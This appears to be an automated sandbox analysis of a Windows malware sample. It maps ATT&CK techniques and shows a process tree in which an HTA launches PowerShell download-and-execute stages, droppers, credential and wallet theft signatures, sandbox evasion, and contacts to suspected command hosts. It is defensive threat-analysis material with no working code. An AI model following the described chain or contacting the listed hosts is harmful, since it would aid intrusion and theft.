Execution: Windows Management Instrumentation (21); Native API (1); Exploitation for Client Execution (1); Command and Scripting Interpreter (2); Scheduled Task/Job (11); PowerShell (2); Systemd Timers; Container Orchestration Job; AppleScript; Windows Command Shell; Unix Shell

Persistence: Scripting (1); DLL Side-Loading (1); Valid Accounts (2); Scheduled Task/Job (11); Registry Run Keys / Startup Folder (111); RC Scripts; Startup Items; At; Cron; Launchd; Scheduled Task; Systemd Timers

Privilege Escalation: Exploitation for Privilege Escalation (1); DLL Side-Loading (1); Extra Window Memory Injection (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Scheduled Task/Job (11); Registry Run Keys / Startup Folder (111); At; Cron; Launchd; Scheduled Task; Systemd Timers

Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (4); Software Packing (22); Timestomp (1); DLL Side-Loading (1); Extra Window Memory Injection (1); Masquerading (11); Valid Accounts (2); Virtualization/Sandbox Evasion (381); Access Token Manipulation (21); Process Injection (412); Mshta (1)

Credential Access: OS Credential Dumping (2); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Keylogging; GUI Input Capture

Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (3); System Information Discovery (2610); Query Registry (1); Security Software Discovery (991); Virtualization/Sandbox Evasion (381); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1); System Network Connections Discovery; Permission Groups Discovery

Lateral Movement: Remote Desktop Protocol (1); SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media

Collection: Archive Collected Data (11); Data from Local System (4); Screen Capture (1); Email Collection (11); Input Capture (21); Clipboard Data (3); Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging

Command and Control: Ingress Tool Transfer (14); Encrypted Channel (11); Non-Standard Port (1); Remote Access Software (1); Non-Application Layer Protocol (4); Application Layer Protocol (125); Commonly Used Port; Web Protocols; File Transfer Protocols; Mail Protocols; DNS; Proxy

Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB

Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking
Behavior Graph ID: 1630726   Sample: aV2ffcSuKl.exe   Start date: 06/03/2025   Architecture: WINDOWS   Score: 100

Network contacted (attached to the graph root): 185.156.73.73 (RELDAS-NETRU, Russian Federation); towerbingobongoboom.com; 904 other IPs or domains
Signatures attached to the graph root: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 30 other signatures

Process tree (dropped files, network contacts and signatures are listed under the process the graph attaches them to; "N other ..." entries are the graph's own collapsed groups):

aV2ffcSuKl.exe
  dropped: C:\Users\user\AppData\Local\...\sGwBNuRjx.hta (HTML)
  signatures: Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection; Creates HTA files
  mshta.exe
    signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell)
    powershell.exe
      dropped: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE (PE32)
      signatures: Found many strings related to Crypto-Wallets (likely being stolen); Powershell drops PE file
      TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE
        dropped: C:\Users\user\AppData\Local\...\rapes.exe (PE32)
        signatures: Detected unpacking (changes PE section rights); Contains functionality to start a terminal service; Tries to evade debugger and weak emulator (self modifying code); 4 other signatures
        rapes.exe
          signatures: Detected unpacking (changes PE section rights); Contains functionality to start a terminal service; Creates HTML files with .exe extension (expired dropper behavior); 2 other signatures
      conhost.exe
  cmd.exe
    signatures: Uses schtasks.exe or at.exe to add and modify task schedules
    2 other processes

rapes.exe (started from the graph root rather than as a child of the sample)
  network: smtp.wmconnect.com; out.glomedvn.com
  dropped: C:\Users\user\AppData\...\df2fea7261.exe (PE32); C:\Users\user\AppData\...\c70962c806.exe (PE32); C:\Users\user\AppData\...\5ef8bafe70.exe (PE32); 21 other malicious files
  signatures: Contains functionality to start a terminal service; Creates multiple autostart registry keys; Hides threads from debuggers; 2 other signatures
  ILqcVeT.exe
    network: 38.180.229.217 port 80 (local port 49762; COGENT-174US, United States)
    dropped: 14 other malicious files
    signatures: Detected unpacking (changes PE section rights); Attempt to bypass Chrome Application-Bound Encryption; 5 other signatures
    2 other processes
      network: 239.255.255.250 (unknown, Reserved)
      signatures: Monitors registry run keys for changes
      chrome.exe
        network: 142.250.181.228 (GOOGLEUS, United States); www.google.com; post.cz
      msedge.exe
  132fd7f0ed.exe
    dropped: C:\Users\user\AppData\Local\...\rKRHHhiYP.hta (HTML)
    signatures: 2 other signatures
    mshta.exe
      signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell)
      powershell.exe
        dropped: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE (PE32)
        TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE
          signatures: Tries to evade debugger and weak emulator (self modifying code); Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check)
        conhost.exe
    cmd.exe
      2 other processes
  rXOl0pp.exe
    dropped: C:\Users\user\AppData\...\vcruntime140[1].dll (PE32); C:\Users\user\AppData\...\softokn3[1].dll (PE32); C:\Users\user\AppData\Local\...\nss3[1].dll (PE32); 3 other malicious files
    signatures: 3 other signatures
  3 other processes
    dropped: C:\Users\user\AppData\Local\...\Gxtuum.exe (PE32); C:\Temp\plDCQRtK9.hta (HTML)
    signatures: Multi AV Scanner detection for dropped file; Contains functionality to start a terminal service; 5 other signatures
    8 other processes
      signatures: Multi AV Scanner detection for dropped file
      powershell.exe
        dropped: C:\Users\...\483d2fa8a0d53818306efeb32d3.exe (PE32)
        conhost.exe
      3 other processes

Gxtuum.exe (started from the graph root)
  dropped: C:\Users\user\AppData\...\vertualiziren.exe (PE32); C:\Users\user\...\vertualiziren[1].exe (PE32)
  vertualiziren.exe
    dropped: C:\ProgramData\jnxnee\benskvi.exe (PE32)
    signatures: 2 other signatures

8 other processes (started from the graph root)
  network: towerbingobongoboom.com 213.209.150.137 (KEMINETAL, Germany); lajahotiere.fr 185.230.63.107 (WIX_COMIL, Israel); 115 other IPs or domains
  dropped: C:\Users\user\AppData\Local\...\1lEt3ife9.hta (HTML)
  signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Suspicious powershell command line found; 2 other signatures
  powershell.exe
    TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE
      signatures: Contains functionality to start a terminal service; Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check)
    conhost.exe
  4 other processes
    signatures: Suspicious execution chain found
    5 other processes
      dropped: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE (PE32)
      signatures: Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
      conhost.exe
